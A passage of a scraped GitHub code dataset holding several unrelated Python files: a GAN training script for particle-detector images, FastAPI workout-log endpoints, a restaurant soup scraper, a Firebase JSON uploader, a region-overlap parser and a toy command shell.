splitnum)):\n matchresult(matchhistory)\n decidefinals(finalnum, matchhistory, playernum)\n\ngeneratematch(playernum, poolnum, roundnum, splitnum)\n\n\n","repo_name":"danielkim0-highschool/Assorted-Python-Projects","sub_path":"TournamentPools.py","file_name":"TournamentPools.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"25097006175","text":"#!/usr/bin/env python\n\"\"\"\n####################################################################################\n # -*- coding: utf-8 -*-\n # Author : Thomas Neuer (tneuer)\n # Creation Date : 2019-11-18 14:45:06\n # Description :\n####################################################################################\n\"\"\"\nimport os\nif \"lhcb_data2\" in os.getcwd():\n os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\nimport sys\nsys.path.insert(1, \"Preprocessing\")\nsys.path.insert(1, \"TFModels\")\nsys.path.insert(1, \"TFModels/building_blocks\")\nsys.path.insert(1, \"TFModels/GAN\")\nsys.path.insert(1, \"TFModels/CGAN\")\nsys.path.insert(1, \"TFModels/CGAN/OLD\")\nsys.path.insert(1, \"Utilities\")\nimport json\nimport grid_search\n\nimport numpy as np\nimport tensorflow as tf\nif \"lhcb_data2\" in os.getcwd():\n gpu_frac = 0.3\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=gpu_frac)\n print(\"1 GPU limited to {}% memory.\".format(np.round(gpu_frac*100)))\nelse:\n gpu_options = None\n\nfrom TFModels.PGAN import create_algorithm\nimport Preprocessing.initialization as init\nfrom building_blocks.layers import logged_dense, conv2d_logged, conv2d_transpose_logged\nfrom building_blocks.layers import reshape_layer, sample_vector_layer, replicate_vector_layer\nfrom building_blocks.layers import logged_dense, conv2d_logged, conv2d_transpose_logged, residual_block, unet, unet_original, inception_block\nfrom functionsOnImages import padding_zeros\nfrom generativeModels import GenerativeModel\n\n\n############################################################################################################\n# Parameter definiton\n############################################################################################################\nparam_dict = {\n \"z_dim\": [32, 64],\n \"optimizer\": [tf.train.RMSPropOptimizer],\n \"algorithm\": [\"CGAN\"],\n \"dataset\": [\"PiplusLowerP\"],\n \"gen_steps\": [1],\n \"adv_steps\": [5],\n # \"architecture\": [\"more_unbalanced\"],\n \"architecture\": [\"unbalanced2\", \"unbalanced\"],\n \"is_patchgan\": [False],\n \"batch_size\": [8],\n \"loss\": [\"cross-entropy\", \"KL\", \"wasserstein\"],\n \"cc\": [False],\n \"lr\": [0.001],\n \"feature_matching\": [False, True],\n \"label_smoothing\": [0.95]\n}\nsampled_params = grid_search.get_parameter_grid(param_dict=param_dict, n=30, allow_repetition=True)\n\nfor params in sampled_params:\n\n activation = tf.nn.leaky_relu\n algorithm = str(params[\"algorithm\"])\n append_y = False\n architecture = str(params[\"architecture\"])\n architecture_path = \"../Architectures/CGAN/{}.json\".format(architecture)\n is_patchgan = bool(params[\"is_patchgan\"])\n loss = str(params[\"loss\"])\n is_wasserstein = loss == \"wasserstein\"\n is_cycle_consistent = bool(params[\"cc\"])\n label_smoothing = float(params[\"label_smoothing\"])\n\n batch_size = int(params[\"batch_size\"])\n dataset = str(params[\"dataset\"])\n epochs = 120\n feature_matching = bool(params[\"feature_matching\"])\n\n keep_cols = [\"x_projections\", \"y_projections\", \"real_ET\"]\n nr_test = 100\n nr_train = 50000\n\n optimizer = params[\"optimizer\"]\n learning_rate = float(params[\"lr\"])\n\n if \"lhcb_data2\" in os.getcwd():\n path_loading = \"../Data/{}/LargeSample\".format(dataset)\n path_results = \"../Results/{}\".format(dataset)\n else:\n path_loading = \"../Data/{}/Debug\".format(dataset)\n path_results = \"../Results/Test/{}\".format(dataset)\n\n reshape_z = \"none\"\n steps_adv = int(params[\"adv_steps\"])\n steps_gen = int(params[\"gen_steps\"])\n steps_log = 3\n\n padding = {\"top\":2, \"bottom\":2, \"left\":0, \"right\":0}\n x_dim = image_shape = (52+padding[\"top\"]+padding[\"bottom\"], 64+padding[\"left\"]+padding[\"right\"], 1)\n y_dim = len(keep_cols)\n z_dim = int(params[\"z_dim\"])\n\n\n ############################################################################################################\n # Network initialization\n ############################################################################################################\n\n\n if reshape_z == \"none\":\n architectures = GenerativeModel.load_from_json(architecture_path)\n architecture_gen = architectures[\"Generator\"]\n architecture_adv = architectures[\"Critic\"]\n if is_patchgan:\n architecture_adv.append([conv2d_logged, {\"filters\": 64, \"kernel_size\": 4, \"strides\": 2, \"activation\": tf.nn.leaky_relu}])\n if is_wasserstein:\n architecture_adv.append([conv2d_logged, {\"filters\": 1, \"kernel_size\": 4, \"strides\": 1, \"activation\": tf.identity}])\n else:\n architecture_adv.append([conv2d_logged, {\"filters\": 1, \"kernel_size\": 4, \"strides\": 1, \"activation\": tf.nn.sigmoid}])\n else:\n architecture_adv[-1][1][\"activation\"] = tf.nn.leaky_relu\n\n elif reshape_z == \"replicate\":\n initial_size = [7, 8]\n architecture_gen = [\n [replicate_vector_layer, {\"size\": initial_size}],\n [conv2d_transpose_logged, {\"filters\": 512, \"kernel_size\": 2, \"strides\": 2, \"activation\": activation}],\n [conv2d_transpose_logged, {\"filters\": 256, \"kernel_size\": 2, \"strides\": 2, \"activation\": activation}],\n [conv2d_transpose_logged, {\"filters\": 1, \"kernel_size\": 2, \"strides\": 2, \"activation\": activation_last_layer}]\n ]\n elif reshape_z == \"sample\":\n initial_size = [7, 8]\n architecture_gen = [\n [sample_vector_layer, {\"size\": initial_size, \"y_dim\": len(keep_cols),\n \"rfunc\": sampling_distribution[0], \"rparams\": sampling_distribution[1]}],\n [conv2d_transpose_logged, {\"filters\": 512, \"kernel_size\": 2, \"strides\": 2, \"activation\": activation}],\n [conv2d_transpose_logged, {\"filters\": 256, \"kernel_size\": 2, \"strides\": 2, \"activation\": activation}],\n [conv2d_transpose_logged, {\"filters\": 1, \"kernel_size\": 2, \"strides\": 2, \"activation\": activation_last_layer}]\n ]\n else:\n raise NotImplementedError(\"Wrong reshape_z method.\")\n\n if is_cycle_consistent:\n architecture_aux = [\n [tf.layers.conv2d, {\"filters\": 128, \"kernel_size\": 2, \"strides\": 2, \"activation\": activation}],\n [tf.layers.conv2d, {\"filters\": 256, \"kernel_size\": 2, \"strides\": 2, \"activation\": activation}],\n [tf.layers.conv2d, {\"filters\": 128, \"kernel_size\": 2, \"strides\": 2, \"activation\": activation}],\n [tf.layers.flatten, {}],\n [tf.layers.dense, {\"units\": z_dim+y_dim, \"activation\": tf.identity}],\n ]\n else:\n architecture_aux = None\n\n ############################################################################################################\n # Data loading\n ############################################################################################################\n if not os.path.exists(path_results):\n os.mkdir(path_results)\n\n path_saving = init.initialize_folder(algorithm=algorithm, base_folder=path_results)\n\n data, scaler = init.load_processed_data(path_loading, return_scaler=True)\n train_calo = data[\"train\"][\"Calo\"][:nr_train]\n train_tracker = data[\"train\"][\"Tracker\"][:nr_train]\n test_calo = data[\"test\"][\"Calo\"]\n test_tracker = data[\"test\"][\"Tracker\"]\n\n train_calo = padding_zeros(train_calo, **padding).reshape([-1, *image_shape])\n test_calo = padding_zeros(test_calo, **padding).reshape([-1, *image_shape])\n test_calo = test_calo[:nr_test]\n logging_calo = test_calo[:15]\n\n ##### Rescale and check that identical\n def invert_standardize_data(data, scaler, exclude=None):\n import pandas as pd\n standardized_data = data.drop(exclude, axis=1, inplace=False)\n colnames = standardized_data.columns.values\n standardized_data = pd.DataFrame(data=scaler.inverse_transform(standardized_data), columns=colnames, index=data.index)\n data = pd.concat([standardized_data, data[exclude]], axis=1, sort=False)\n return data\n\n train_tracker[\"real_ET\"] = invert_standardize_data(data=train_tracker, scaler=scaler[\"Tracker\"], exclude=[\"theta\", \"phi\", \"region\"])[\"real_ET\"]\n train_tracker[\"real_ET\"] /= scaler[\"Calo\"]\n\n test_tracker[\"real_ET\"] = invert_standardize_data(data=test_tracker, scaler=scaler[\"Tracker\"], exclude=[\"theta\", \"phi\", \"region\"])[\"real_ET\"]\n test_tracker[\"real_ET\"] /= scaler[\"Calo\"]\n\n assert np.max(train_calo) == 1, \"Train calo maximum not one. Given: {}.\".format(np.max(train_calo))\n # assert np.allclose(np.mean(train_tracker[keep_cols[:-1]], axis=0), 0, atol=1e-5), \"Train not centralized: {}.\".format(\n # np.mean(train_tracker[keep_cols], axis=0)\n # )\n # assert np.allclose(np.mean(test_tracker, axis=0), 0, atol=1e-1), \"Test not centralized: {}.\".format(np.mean(test_tracker, axis=0))\n # assert np.allclose(np.std(train_tracker[keep_cols[:-1]], axis=0), 1, atol=1e-10), \"Train not standardized: {}.\".format(\n # np.std(train_tracker[keep_cols], axis=0)\n # )\n assert image_shape == train_calo.shape[1:], \"Wrong image shape vs train shape: {} vs {}.\".format(image_shape, train_calo.shape[1:])\n train_tracker = train_tracker[keep_cols].values\n test_tracker = test_tracker[keep_cols].values\n test_tracker = test_tracker[:nr_test]\n logging_tracker = test_tracker[:15]\n\n nr_train = train_calo.shape[0]\n\n ############################################################################################################\n # Preparation\n ############################################################################################################\n def prepare_algorithm(network, optimizer, learning_rate):\n network.compile(logged_labels=logging_tracker, logged_images=logging_calo, optimizer=optimizer, learning_rate=learning_rate,\n loss=loss, feature_matching=feature_matching, label_smoothing=label_smoothing)\n network.set_attributes(keep_cols)\n post_message = \"\"\"\\nCalo shape: {}\\nTracker shape: {}\n \\nUsed attributes: {}\n \\nAppend attributes at every layer: {}\"\"\".format(train_calo.shape, train_tracker.shape, keep_cols, append_y)\n network.log_architecture(post_message=post_message)\n\n nr_params = network.get_number_params()\n nr_gen_params = network._nets[0].get_number_params()\n nr_disc_params = network._nets[1].get_number_params()\n sampler = network.get_sampling_distribution()\n config_data.update({\"nr_params\": nr_params, \"sampler\": sampler, \"generator_out\": network._generator._output_layer.name, \"optimizer\": optimizer.__name__, \"nr_gen_params\": nr_gen_params, \"nr_disc_params\": nr_disc_params})\n\n config_data.pop(\"architectures\")\n with open(path_saving+\"/config.json\", \"w\") as f:\n json.dump(config_data, f, indent=4)\n\n config_data = init.create_config_file(globals())\n\n ############################################################################################################\n # Model Training\n ############################################################################################################\n\n try:\n network = create_algorithm(algorithm, x_dim=x_dim, y_dim=y_dim, z_dim=z_dim,\n gen_architecture=architecture_gen, adv_architecture=architecture_adv,\n aux_architecture=architecture_aux,\n folder=path_saving, append_y_at_every_layer=append_y,\n is_patchgan=is_patchgan, is_wasserstein=is_wasserstein)\n\n prepare_algorithm(network, optimizer, learning_rate)\n\n network.show_architecture()\n network.train(x_train=train_calo, y_train=train_tracker, x_test=test_calo, y_test=test_tracker,\n epochs=epochs, batch_size=batch_size, steps=steps_gen, log_step=steps_log, gpu_options=gpu_options,\n batch_log_step=None)\n with open(path_saving+\"/EXIT_FLAG0.txt\", \"w\") as f:\n f.write(\"EXIT STATUS: 0. No errors or warnings.\")\n tf.reset_default_graph()\n except GeneratorExit as e:\n with open(path_saving+\"/EXIT_FLAG1.txt\", \"w\") as f:\n f.write(\"EXIT STATUS: 1. {}.\".format(e))\n tf.reset_default_graph()\n","repo_name":"tneuer/Masterarbeit","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73475143687","text":"import uuid\nfrom pydantic import BaseModel\nfrom fastapi import Depends\nfrom app.ctx import AppCtx\nfrom app.utils import fastapi as fastapi_utils\nfrom app.utils import auth as auth_utils\nfrom sqlalchemy.sql import expression as sa_exp\nfrom app.models import orm as m\n\nrouter = fastapi_utils.CustomAPIRouter(\n prefix=\"/performance/log\", tags=[\"performance_log\"]\n)\n\n\nclass PerformanceLogGetAndListResponse(BaseModel):\n id: uuid.UUID\n count: int\n weight: int\n\n\n@router.api_wrapper(\"GET\", \"/:id\", error_codes=[])\nasync def performance_log_get(\n id: uuid.UUID,\n) -> PerformanceLogGetAndListResponse:\n performance_log = (\n await AppCtx.current.db.session.execute(\n sa_exp.select(m.PerformanceLog).where(m.PerformanceLog.id == id)\n )\n ).scalar_one_or_none()\n\n if performance_log is None:\n raise fastapi_utils.LogicError(fastapi_utils.LogicErrorCodeEnum.ModelNotFound)\n\n return PerformanceLogGetAndListResponse(\n id=performance_log.id,\n count=performance_log.count,\n weight=performance_log.weight,\n )\n\n\n@router.api_wrapper(\"GET\", \"\", error_codes=[])\nasync def performance_log_list() -> list[PerformanceLogGetAndListResponse]:\n performance_log_query = sa_exp.select(m.PerformanceLog)\n\n performance_log_query = performance_log_query.order_by(\n m.PerformanceLog.created.asc()\n )\n\n performance_log_list = (\n (await AppCtx.current.db.session.execute(performance_log_query)).scalars().all()\n )\n\n return [\n PerformanceLogGetAndListResponse(\n id=performance_log.id,\n count=performance_log.count,\n weight=performance_log.weight,\n )\n for performance_log in performance_log_list\n ]\n\n\nclass PerformanceLogPostRequest(BaseModel):\n count: int\n weight: int\n exercise_category_id: uuid.UUID\n daily_log_id: uuid.UUID\n\n\nclass PerformanceLogPostResponse(BaseModel):\n id: uuid.UUID\n\n\n@router.api_wrapper(\n \"POST\",\n \"\",\n error_codes=[],\n)\nasync def performance_log_post(\n q: PerformanceLogPostRequest,\n) -> PerformanceLogPostResponse:\n exercise_category = (\n await AppCtx.current.db.session.execute(\n sa_exp.select(m.ExerciseCategory).where(\n m.ExerciseCategory.id == q.exercise_category_id\n )\n )\n ).scalar_one_or_none()\n\n if exercise_category is None:\n raise fastapi_utils.LogicError(fastapi_utils.LogicErrorCodeEnum.ModelNotFound)\n\n daily_log = (\n await AppCtx.current.db.session.execute(\n sa_exp.select(m.DailyLog).where(m.DailyLog.id == q.daily_log_id)\n )\n ).scalar_one_or_none()\n\n if daily_log is None:\n raise fastapi_utils.LogicError(fastapi_utils.LogicErrorCodeEnum.ModelNotFound)\n\n performance_log = m.PerformanceLog(\n count=q.count,\n weight=q.weight,\n exercise_category=exercise_category,\n daily_log=daily_log,\n )\n\n AppCtx.current.db.session.add(performance_log)\n\n await AppCtx.current.db.session.commit()\n\n return PerformanceLogPostResponse(id=performance_log.id)\n\n\nclass PerformanceLogPatchRequest(BaseModel):\n count: int | None\n weight: int | None\n\n\nclass PerformanceLogPatchResponse(BaseModel):\n id: uuid.UUID\n count: int\n weight: int\n\n\n@router.api_wrapper(\n \"PATCH\",\n \"/:id\",\n error_codes=[],\n)\nasync def performance_log_patch(\n id: uuid.UUID,\n q: PerformanceLogPatchRequest,\n) -> PerformanceLogPatchResponse:\n performance_log = (\n await AppCtx.current.db.session.execute(\n sa_exp.select(m.PerformanceLog).where(m.PerformanceLog.id == id)\n )\n ).scalar_one_or_none()\n\n if performance_log is None:\n raise fastapi_utils.LogicError(fastapi_utils.LogicErrorCodeEnum.ModelNotFound)\n\n for key, value in q.__dict__.items():\n if value is not None:\n setattr(performance_log, key, value)\n\n AppCtx.current.db.session.add(performance_log)\n\n await AppCtx.current.db.session.commit()\n\n return PerformanceLogPatchResponse(\n id=performance_log.id,\n count=performance_log.count,\n weight=performance_log.weight,\n )\n\n\n@router.api_wrapper(\n \"DELETE\",\n \"/:id\",\n error_codes=[],\n)\nasync def performance_log_delete(\n id: uuid.UUID,\n) -> fastapi_utils.DefaultResponse:\n performance_log = (\n await AppCtx.current.db.session.execute(\n sa_exp.select(m.PerformanceLog).where(m.PerformanceLog.id == id)\n )\n ).scalar_one_or_none()\n\n if performance_log is None:\n raise fastapi_utils.LogicError(fastapi_utils.LogicErrorCodeEnum.ModelNotFound)\n\n await AppCtx.current.db.session.delete(performance_log)\n\n await AppCtx.current.db.session.commit()\n\n return fastapi_utils.DefaultResponse()\n","repo_name":"Mactto/weight-daily-log-api","sub_path":"app/apis/performance_log.py","file_name":"performance_log.py","file_ext":"py","file_size_in_byte":4773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41092897494","text":"from lxml.html import parse\nfrom pprint import pprint\nimport pickle\nimport re\n\n\"\"\"\nFetch this week's soup from Leon's website\n\nRun: daily, early morning\n\"\"\"\n\noutfile = '/tmp/leon.pkl'\nsoupurl = 'http://leonrestaurants.co.uk/menu/all-day/'\n\ndef fix_text(astr) :\n\tastr = astr.replace(' Soup', '').strip()\n\treturn astr\n\n\ndef is_soup(item):\n\tif (\"Soup\" in item):\n\t\treturn True\n\treturn False\n\n\ndoc = parse(soupurl)\nelements = doc.xpath('//div[@class=\"more-info-wrapper\"]/h1[@class=\"menu-item-title\"]')\n\nroughlist = [elem.text for elem in elements if (is_soup(elem.text))]\nsouplist = map(fix_text, roughlist)\n\n#pprint(souplist)\n\noutput = open(outfile, 'wb')\npickle.dump(souplist, output, -1)\noutput.close()\n","repo_name":"simonharris/whatsoupisittoday.com","sub_path":"_scripts/fetch_leon.py","file_name":"fetch_leon.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"22860830503","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('ride', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='ride',\n name='serviced_by',\n field=models.ForeignKey(related_name='rides', blank=True, to='core.Driver', null=True),\n ),\n ]\n","repo_name":"cmpe-295/project-backend","sub_path":"safe_ride/ride/migrations/0002_auto_20161018_0043.py","file_name":"0002_auto_20161018_0043.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8749001831","text":"# Import for data-typing\nfrom google.auth.transport.requests import AuthorizedSession\nimport google.auth.transport.requests as requests\nfrom http import client\n\n# Built-in libraries\nimport json\nimport threading\nimport time\n\n# Global variables\nerror_files = []\n# ----------------------------------------------------------------------------------\n\n\nclass RequestThread(\n threading.Thread\n):\n def __init__(\n self,\n auth_session: AuthorizedSession,\n file_dir: str,\n index_json_dir: str,\n full_url: str,\n file_name: str,\n index_lock: threading.Lock,\n print_lock: threading.Lock,\n error_lock: threading.Lock,\n ) -> None:\n \"\"\"\n Thread to handle POST requests\n\n Args:\n auth_session (AuthorizedSession): Authenticated request object\n file_dir (str): Directory of JSONs\n index_json_dir (str): Directory of index.json\n full_db_url (str): URL of database\n file_name (str): Name of file to add to database\n index_lock (threading.Lock): Lock to prevent race conditions while accessing/editing index.json\n print_lock (threading.Lock): Lock to prevent race conditions while printing\n error_lock (threading.Lock): Lock to prevent race conditions while adding to error list\n \"\"\"\n threading.Thread.__init__(self)\n self.session = auth_session\n self.file_dir = file_dir\n self.index_json_dir = index_json_dir\n self.full_url = full_url\n self.file_name = file_name\n self.index_lock = index_lock\n self.print_lock = print_lock\n self.error_lock = error_lock\n self.connection_attempts = 0\n\n def run(\n self\n ) -> None:\n \"\"\"\n Function that overrides threading.Thread's default behavior.\n \"\"\"\n global error_files\n\n # Ensures that the program will attempt a few times to connect to the database\n while self.connection_attempts < 3:\n try:\n # Checks to see if the file has already been added to the index\n with self.index_lock:\n with open(self.index_json_dir, \"r\", encoding=\"utf-8\") as f:\n index_json = json.load(f)\n\n # If the file is already in the index\n if self.file_name in index_json.keys():\n # Print lock\n with self.print_lock:\n print(f\"{self.file_name} already exists! \")\n\n # If the file is not already in the index\n else:\n # Builds file path\n full_file_dir = f\"{self.file_dir}/{self.file_name}\"\n\n # Opens JSON file (thread safe because threads are accessing different files)\n with open(full_file_dir, \"r\", encoding=\"utf-8\") as f:\n edit_json_file = json.load(f)\n\n # Renames keys since Firebase does not like $'s in keys\n schema = edit_json_file['$schema']\n json_id = edit_json_file['$id']\n\n del edit_json_file['$schema']\n del edit_json_file['$id']\n\n edit_json_file['schema'] = schema\n edit_json_file['id'] = json_id\n\n json_file = json.dumps(edit_json_file, indent=4, sort_keys=True)\n\n # Sends JSON to database\n response = self.session.post(self.full_url, data=json_file)\n\n # If the database says it was a good request\n if response.status_code == 200:\n\n # Puts response into a JSON\n response_detail = response.json()\n\n # Index lock\n with self.index_lock:\n # Pulls up latest version of index\n with open(self.index_json_dir, \"r\", encoding=\"utf-8\") as f:\n index_json = json.load(f)\n\n # We add the added json name to the index file with the unique ID assigned by the db\n index_json[str(self.file_name)] = response_detail[\"name\"]\n\n # Overwrites index JSON (with formatting)\n with open(self.index_json_dir, \"w\") as f:\n json.dump(index_json, f, indent=4, sort_keys=True)\n\n # Print lock\n with self.print_lock:\n print(f\"{self.file_name} successfully added!\")\n\n # If the databases says it was not a good request\n else:\n # Error lock\n with self.error_lock:\n error_files.append(\n f\"{self.file_name} Error: {response.status_code}\"\n )\n\n # If there is a connection error\n except client.RemoteDisconnected:\n print(f\"Connection failed with {self.file_name}\")\n self.connection_attempts += 1\n\n if self.connection_attempts >= 3:\n error_files.append(f\"{self.file_name} Error: ConnectionError\")\n break\n\n else:\n time.sleep(3)\n pass\n\n else:\n break\n\n\ndef main(\n auth_session: AuthorizedSession,\n file_dir: str,\n index_json_dir: str,\n db_folder_url: str,\n file_list: list[str],\n) -> None:\n \"\"\"\n Main function to add JSONs to the database\n\n Args:\n auth_session (AuthorizedSession): Authenticated request object\n file_dir (str): Directory of JSONs\n index_json_dir (str): Directory of index.json\n db_folder_url (str): URL of target database folder\n file_list (list[str]): List of file names within target directory\n \"\"\"\n global error_files\n\n # Creates locks\n index_lock = threading.Lock()\n print_lock = threading.Lock()\n error_lock = threading.Lock()\n\n # Creates threads\n threads = []\n for file in file_list:\n threads.append(\n RequestThread(\n auth_session,\n file_dir,\n index_json_dir,\n db_folder_url,\n file,\n index_lock,\n print_lock,\n error_lock,\n )\n )\n\n # Starts threads\n for thread in threads:\n thread.start()\n\n # Joins threads\n for thread in threads:\n thread.join()\n\n # Error notifications\n if len(error_files) > 0:\n print(\"The following files had errors:\\n\")\n\n for file in error_files:\n print(file)\n\n error_files = []\n\n print()\n\n\n# If the program is run directly when it is not supposed to\nif __name__ == \"__main__\":\n print(\n \"This code is not meant to be executed directly, please execute main.py instead.\"\n )\n","repo_name":"SethHartman13/Magic-Item-Database-v.2","sub_path":"magic_item_post.py","file_name":"magic_item_post.py","file_ext":"py","file_size_in_byte":7066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"25043136042","text":"class Region:\n \"\"\"Class to store region info\"\"\"\n\n def __init__(self, y_axis, start, stop):\n\n self.y_axis = y_axis\n self.start = start\n self.stop = stop\n\n def to_string(self):\n \"\"\"Return region info as string\"\"\"\n\n line = list(map(str, [self.y_axis, self.start, self.stop]))\n return ('\\t'.join(line) + '\\n')\n\n def to_list(self):\n \"\"\"Return region info as list\"\"\"\n\n return [self.y_axis, self.start, self.stop]\n\n\nclass Segment:\n \"\"\"Class to store segment info\"\"\"\n\n def __init__(self, count, start, stop):\n\n self.count = count\n self.start = start\n self.stop = stop\n\n def to_string(self):\n \"\"\"Return segment info as string\"\"\"\n \n line = list(map(str, [self.count, self.start, self.stop]))\n return ('\\t'.join(line) + '\\n')\n\n def to_list(self):\n \"\"\"Return segment info as string\"\"\"\n\n return [self.count, self.start, self.stop]\n\n\nclass Parser:\n \"\"\"Class to get and parse data from source file\"\"\"\n\n def __init__(self, data_path):\n\n self.data_path = data_path\n # Store regions in a list of Region objects\n self.regions = []\n # Store segments in a list of Segment objects\n self.segments = []\n\n self.get_data()\n self.non_overlapping_segments()\n\n def get_data(self):\n \"\"\"Read source file and create regions and segments datasets\"\"\"\n\n regions_file = open(self.data_path, 'r')\n regions_lines = regions_file.readlines()\n regions_file.close()\n\n for line in regions_lines:\n split_line = line.rstrip().split('\\t')\n start = int(split_line[0])\n stop = int(split_line[1])\n region = Region(0, start, stop)\n self.regions.append(region)\n self.segments = self.segments + [start, stop]\n\n def non_overlapping_segments(self):\n \"\"\"Parse segments dataset as a list of non-overlapping Segment intervals\"\"\"\n\n # Remove duplicated segments to avoid duplicated non-overlapping intervals\n self.segments = list(set(self.segments))\n # Order the segments to set correctly non-overlapping interval\n self.segments.sort()\n # Set non-overlapping intervals as region-region start-stop pairs Segment objects\n # If segment B has start position X, then segment A has end position X-1. The segments do not overlap.\n self.segments = [Segment(0, self.segments[i], self.segments[i + 1] - 1) for i in range(len(self.segments)-1)]\n \n\nclass Process:\n \"\"\"Class to process part1 and part2 tasks and export results\"\"\"\n\n def __init__(self, regions, segments):\n\n self.regions = regions\n self.segments = segments\n\n def to_list(self, dataset):\n \"\"\"Return dataset(Region/Segment) as a list of list info\"\"\"\n\n return [data.to_list() for data in dataset]\n\n def export_data(self, dataset, path):\n \"\"\"Export results to output file\"\"\"\n\n output = open(path, 'w')\n for data in dataset:\n output.write(data.to_string())\n output.close()\n\n def overlap(self, region1, region2):\n \"\"\"Check if two region/segment overlaps\"\"\"\n\n # Overlap border cases consideration:\n # If the overlap is based on 1 position been a START ovelap over a STOP, is not considered overlap\n return ((region1.start <= region2.start < region1.stop) or \n (region1.start < region2.stop <= region1.stop) or \n ((region1.start >= region2.start) and (region1.stop <= region2.stop)))\n\n def part1_task(self):\n \"\"\"Part1 task calculation\"\"\"\n\n for region in self.regions:\n # Store the Y-axis level used by other regions on the start-stop coordinates scope\n overlaped_y_axis = []\n for comp_region in self.regions: \n if self.overlap(comp_region, region):\n overlaped_y_axis.append(comp_region.y_axis)\n\n overlaped_y_axis.sort()\n # Select the highest Y-axis level in used and add 1\n updated_y_axis = overlaped_y_axis[-1] + 1\n # Check if there is and empty lower level. If there are more than one select the lowest\n i = 0\n while i < len(overlaped_y_axis)-1:\n if overlaped_y_axis[i+1] > overlaped_y_axis[i] + 1:\n updated_y_axis = overlaped_y_axis[i] + 1\n break\n i+=1\n # Update the region Y-axis level value\n region.y_axis = updated_y_axis\n\n def part2_task(self):\n \"\"\"Part2 task calculation\"\"\"\n\n for segment in self.segments:\n for region in self.regions:\n if self.overlap(segment, region):\n # If a region overlap the segment add 1 to segment count\n segment.count += 1\n # Remove segments with no overlapping regions\n self.segments = [segment for segment in self.segments if segment.count>0]\n","repo_name":"AgustinPardo/Illumina-Challenge","sub_path":"core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":5019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10002337293","text":"import os\nimport shutil\n\nimport subprocess\n\n\nclass Shell: \n \n \n\n def __init__(self, root_path):\n \n self.root_path = root_path\n self.process = 0\n if os.path.exists('log.txt'):\n \n posR = open('log.txt','r')\n pos = posR.read()\n strings = pos.split('\\n')\n if pos.__len__() > 1:\n \n lastCommand = strings[strings.__len__()-2]\n\n self.callWrite = int(lastCommand[0])\n else:\n self.callWrite = 0\n else:\n self.log = open('log.txt','x')\n self.callWrite = 0\n \n def ls(self):\n #pasta = self.root_path\n #esta mostrado diretorios desnecessarios\n\n return os.listdir('./')\n\n def pwd(self):\n return self.root_path\n\n def cd(self, path):\n \n if path.__len__() == 1:\n os.chdir('/')\n self.root_path = os.getcwd()\n else:\n try:\n os.chdir(path[1])\n self.root_path = os.getcwd()\n \n except:\n print(\"cd: \"+path[1]+\": No such file or directory\")\n\n def cp(self, orig, dest):\n try:\n shutil.copy( orig , dest )\n except:\n print('cp: cannot stat '+orig+': No such file or directory')\n\n def mv(self, orig, dest):\n try:\n if orig == 'log.txt' or orig == 'help':\n print('no permission to remove this file press help for information')\n else:\n shutil.move( orig , dest ) \n except:\n print('mv: cannot stat '+orig+': No such file or directory') \n \n def rm(self,arq='', file=''):\n if os.path.exists(file):\n if arq == '':\n if os.path.isfile(file):\n if file == 'log.txt' or file == 'help.txt':\n print('no permission to remove file \\npress help for information')\n else:\n os.remove(file)\n\n elif os.path.isdir(file):\n print('rm: cannot remove '+file+': Is a directory')\n else:\n print('rm: cannot remove '+file+': No such file or directory')\n else:\n if arq == '-r':\n shutil.rmtree(file)\n else:\n print('rm: cannot remove '+file+': No such file or directory')\n \n def mkdir(self,pasta):\n if os.path.isdir(pasta):\n print ('mkdir: cannot create directory \"'+pasta+'\": File exists')\n else:\n os.mkdir(pasta)\n\n def uname(self):\n return os.uname() \n \n def rename(self,orig,dest):\n if os.path.exists(orig):\n os.rename(orig,dest)\n else:\n print('No such file or directory')\n\n def cat(self,arq):\n file = open(arq,'r')\n lines = file.read()\n return lines\n\n def testScript(self,script):\n if ( script[script.__len__()-3] == '.'):\n if script[script.__len__()-2] == 'p' and script[script.__len__()-1] == 'y':\n return True\n else:\n return False\n else:\n return False\n\n def exec(self,scrip):\n try:\n exec(open(scrip).read())\n\n except:\n print('error ao execultar o script')\n\n def writeLog(self,string):\n self.callWrite+=1\n self.log= open(\"log.txt\", \"a\")\n s = str(self.callWrite)+\" \"+string+\"\\n\"\n self.log.write(s)\n\n def history(self):\n return self.cat('log.txt')\n\n def grep(self, words, arquivo):\n out = []\n try:\n \n strings = self.readStrings(arquivo)\n for word in strings:\n st = word.split(' ')\n for item in st:\n if words == item:\n out.append(words) \n \n return out\n except:\n return out\n\n\n \n def readStrings(self,arquivo):\n posR = open(arquivo,'r')\n pos = posR.readlines()\n return pos\n\n \n\n\n\nif __name__ == \"__main__\":\n shell = Shell( os.getcwd())\n \n print(\"-- Welcome to Shell \\nPress -help for Commands or q to out--\\n\")\n s = ' '\n while(s != 'exit'):\n s = input(\"\"+shell.pwd()+\"# \") \n\n s1 = s.split(' ')\n if s1.__len__() == 1:\n shell.writeLog(s)\n if s1[0] == \"ls\":\n for item in shell.ls():\n print(item)\n \n elif s1[0] == \"pwd\":\n print(shell.pwd())\n \n elif s1[0] == \"uname\":\n \n print(shell.uname())\n \n elif s1[0] == 'help':\n print('needs help')\n\n elif s1[0] == 'history':\n print(shell.history())\n elif s1[0] == 'exit':\n pass\n else:\n print(s+\": command not found\")\n\n else:\n shell.writeLog(s)\n if s1[0] == 'cd':\n \n if( 